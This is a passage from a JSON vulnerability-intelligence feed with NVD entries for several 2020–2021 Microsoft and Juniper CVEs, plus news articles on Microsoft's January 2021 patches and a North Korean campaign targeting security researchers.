["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-03-05T16:41:19", "description": "Microsoft splwow64 Elevation of Privilege Vulnerability", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1648", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-03-04T15:21:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-1648", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1648", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Microsoft Edge (HTML-based) Memory Corruption Vulnerability", "edition": 3, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1705", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1705"], "modified": "2021-01-20T20:25:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2021-1705", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1705", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1667", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1667"], "modified": "2021-01-20T20:33:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2021-1667", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1667", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-06T14:31:25", "description": "On Juniper Networks EX2300 Series, receipt of a stream of specific multicast packets by the layer2 interface can cause high CPU load, which could lead to traffic interruption. This issue occurs when multicast packets are received by the layer 2 interface. To check if the device has high CPU load due to this issue, the administrator can issue the following command: user@host> show chassis routing-engine Routing Engine status: ... Idle 2 percent the \"Idle\" value shows as low (2 % in the example above), and also the following command: user@host> show system processes summary ... PID USERNAME PRI NICE SIZE RES STATE TIME WCPU COMMAND 11639 root 52 0 283M 11296K select 12:15 44.97% eventd 11803 root 81 0 719M 239M RUN 251:12 31.98% fxpc{fxpc} the eventd and the fxpc processes might use higher WCPU percentage (respectively 44.97% and 31.98% in the above example). This issue affects Juniper Networks Junos OS on EX2300 Series: 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-10-16T21:15:00", "title": "CVE-2020-1668", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1668"], "modified": "2020-10-27T18:27:00", "cpe": ["cpe:/o:juniper:junos:18.4", "cpe:/o:juniper:junos:20.1", "cpe:/o:juniper:junos:19.3", "cpe:/o:juniper:junos:18.1", "cpe:/o:juniper:junos:18.3", "cpe:/o:juniper:junos:19.4", "cpe:/o:juniper:junos:18.2", "cpe:/o:juniper:junos:19.1", "cpe:/o:juniper:junos:19.2"], "id": "CVE-2020-1668", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1668", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:juniper:junos:18.1:r3-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:20.1:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r1-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s8:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s6:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r2-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r3-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s10:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r1:-:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s6:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s6:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.4:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r3-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.4:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r3-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r3-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.4:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r3-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r1-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s9:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:20.1:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.4:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r3-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s6:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s7:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2-s2:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2021-01-13T06:30:13", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1674", "CVE-2021-1705"], "description": "[](<https://thehackernews.com/images/-cZjUACk7bgA/X_5-UYTlv-I/AAAAAAAABec/V3IW_ZyIh9k3keOxtl2lI0PDNAaEMTRQACLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nFor the first patch Tuesday of 2021, Microsoft released [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>) addressing a total of 83 flaws spanning as many as 11 products and services, including an actively exploited zero-day vulnerability.\n\nThe latest security patches cover Microsoft Windows, Edge browser, ChakraCore, Office and Microsoft Office Services, and Web Apps, Visual Studio, Microsoft Malware Protection Engine, .NET Core, ASP .NET, and Azure. Of these 83 bugs, 10 are listed as Critical, and 73 are listed as Important in severity.\n\nThe most severe of the issues is a remote code execution (RCE) flaw in Microsoft Defender ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) that could allow attackers to infect targeted systems with arbitrary code.\n\nMicrosoft Malware Protection Engine (mpengine.dll) provides the scanning, detection, and cleaning capabilities for Microsoft Defender antivirus and antispyware software. The last version of the software affected by the flaw is 1.1.17600.5, before it was addressed in version 1.1.17700.4.\n\nThe bug is also known to have been actively exploited in the wild, although details are scarce on how widespread the attacks are or how this is being exploited. It's also a zero-click flaw in that the vulnerable system can be exploited without any interaction from the user.\n\nMicrosoft said that despite active exploitation, the technique is not functional in all situations and that the exploit is still considered to be at a proof-of-concept level, with substantial modifications required for it to work effectively.\n\nWhat's more, the flaw may already be resolved as part of automatic updates to the Malware Protection Engine \u2014 which it typically releases once a month or as when required to safeguard against newly discovered threats \u2014 unless the systems are not connected to the Internet.\n\n\"For organizations that are configured for automatic updating, no actions should be required, but one of the first actions a threat actor or malware will try to attempt is to disrupt threat protection on a system so definition and engine updates are blocked,\" said Chris Goettl, senior director of product management and security at Ivanti.\n\nTuesday's patch also rectifies a privilege escalation flaw ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) introduced by a previous patch in the GDI Print / Print Spooler API (\"splwow64.exe\") that was [disclosed by Google Project Zero](<https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html>) last month after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOther vulnerabilities fixed by Microsoft include a memory corruption flaws in Microsoft Edge browser ([CVE-2021-1705](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1705>)), a Windows Remote Desktop Protocol Core Security feature bypass flaw ([CVE-2021-1674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1674>), CVSS score 8.8), and five critical RCE flaws in Remote Procedure Call Runtime.\n\nTo install the latest security updates, Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-01-13T05:01:20", "published": "2021-01-13T05:01:00", "id": "THN:9CF96D7230D0DBA395C1DEDA718226AD", "href": "https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html", "type": "thn", "title": "Microsoft Issues Patches for Defender Zero-Day and 82 Other Windows Flaws", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-29T10:26:41", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "[](<https://thehackernews.com/images/-iuZmw75wd8g/YA-j-PbeyrI/AAAAAAAABlE/RgTbZC607W00K50gmsHyQ2wxzElQjkCMwCLcBGAsYHQ/s0/north-korean-hackers.jpg>)\n\nGoogle on Monday disclosed details about an ongoing campaign carried out by a government-backed threat actor from North Korea that has targeted security researchers working on vulnerability research and development.\n\nThe internet giant's Threat Analysis Group (TAG) said the adversary created a research blog and multiple profiles on various social media platforms such as Twitter, Twitter, LinkedIn, Telegram, Discord, and Keybase in a bid to communicate with the researchers and build trust.\n\nThe goal, it appears, is to steal exploits developed by the researchers for possibly undisclosed vulnerabilities, thereby allowing them to stage further attacks on vulnerable targets of their choice.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\n\"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including 'guest' posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers,\" [said](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) TAG researcher Adam Weidemann.\n\nThe attackers created as many as 10 fake Twitter personas and five LinkedIn profiles, which they used to engage with the researchers, share videos of exploits, retweet other attacker-controlled accounts, and share links to their purported research blog.\n\nIn one instance, the actor used Twitter to share a YouTube video of what it claimed to be an exploit for a recently patched Windows Defender flaw ([CVE-2021-1647](<https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html>)), when in reality, the exploit turned out to be fake.\n\n[](<https://thehackernews.com/images/-z357EvP7xhQ/YA-h_c5mACI/AAAAAAAABk4/Rfunq4GEsRYSpfML7a1rW1uzau-Y92QCQCLcBGAsYHQ/s0/twitter.jpg>)\n\nThe North Korean hackers are also said to have used a \"novel social engineering method\" to hit security researchers by asking them if they would like to collaborate on vulnerability research together and then provide the targeted individual with a Visual Studio Project.\n\nThis Visual Studio Project, besides containing the source code for exploiting the vulnerability, included a custom malware that establishes communication with a remote command-and-control (C2) server to execute arbitrary commands on the compromised system.\n\nKaspersky researcher Costin Raiu, in a [tweet](<https://twitter.com/craiu/status/1353964086455902208>), noted the malware delivered via the project shared code-level similarities with [Manuscrypt](<https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer>) (aka FAILCHILL or Volgmer), a previously known Windows backdoor deployed by the Lazarus Group.\n\nWhat's more, TAG said it observed several cases where researchers were infected after visiting the research blog, following which a malicious service was installed on the machine, and an in-memory backdoor would begin beaconing to a C2 server.\n\n[](<https://thehackernews.com/images/-5WNEGS3rJFg/YA-ht9CNs1I/AAAAAAAABkw/Q6gouDrb7eg3yZSUK7zlsoHZh-S_1heVACLcBGAsYHQ/s0/security-reseachers.jpg>)\n\nWith the victim systems running fully patched and up-to-date versions of Windows 10 and Chrome web browser, the exact mechanism of compromise remains unknown. But it's suspected that the threat actor likely leveraged zero-day vulnerabilities in Windows 10 and Chrome to deploy the malware.\n\n\"If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research,\" Weidemann said.\n\n### UPDATE (28 Jan, 2021): Microsoft releases more information on this campaign\n\nIn a separate analysis, Microsoft corroborated the findings, attributing the attacks to a threat actor it calls ZINC, also known as Lazarus Group or Hidden Cobra.\n\nThe Windows maker said the campaign took roots in mid-2020 when the adversary \"started building a reputation in the security research community on Twitter by retweeting high quality security content and posting about exploit research from an actor-controlled blog.\"\n\nMicrosoft's analysis of the malicious DLL (dubbed \"Comebacker\") has also revealed the group's attempts to evade detection via static indicators of compromise (IoCs) by frequently changing file names, file paths, and exported functions. \"We were first alerted to the attack when Microsoft Defender for Endpoint detected the Comebacker DLL attempting to perform process privilege escalation,\" the company [said](<https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/>).\n\nThat's not all. With some researchers infected simply by visiting the website on fully patched systems running Windows 10 and Chrome browser, the company suspects a Chrome exploit chain leveraging zero-day or patch gap exploits was hosted on the blog, leading to the compromise.\n\n\"A blog post titled _DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug_, was shared by the actor on October 14, 2020 from Twitter,\" the researchers said. \"From October 19-21, 2020, some researchers, who hadn't been contacted or sent any files by ZINC profiles, clicked the links while using the Chrome browser, resulting in known ZINC malware on their machines soon after.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-01-29T09:15:54", "published": "2021-01-26T05:10:00", "id": "THN:970890B8E519A3BC5427798160F5F09C", "href": "https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html", "type": "thn", "title": "N. Korean Hackers Targeting Security Experts to Steal Undisclosed Researches", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-02-04T21:15:31", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "CVE-2021-1647 is a zero-day remote code execution vulnerability in the Malware Protection Engine component (mpengine.dll) of Microsoft\u2019s Defender anti-virus product. It was published as part of the January 2021 Patch Tuesday release, along with a disclosure from Microsoft acknowledging that the vulnerability had been exploited in the wild. More information: 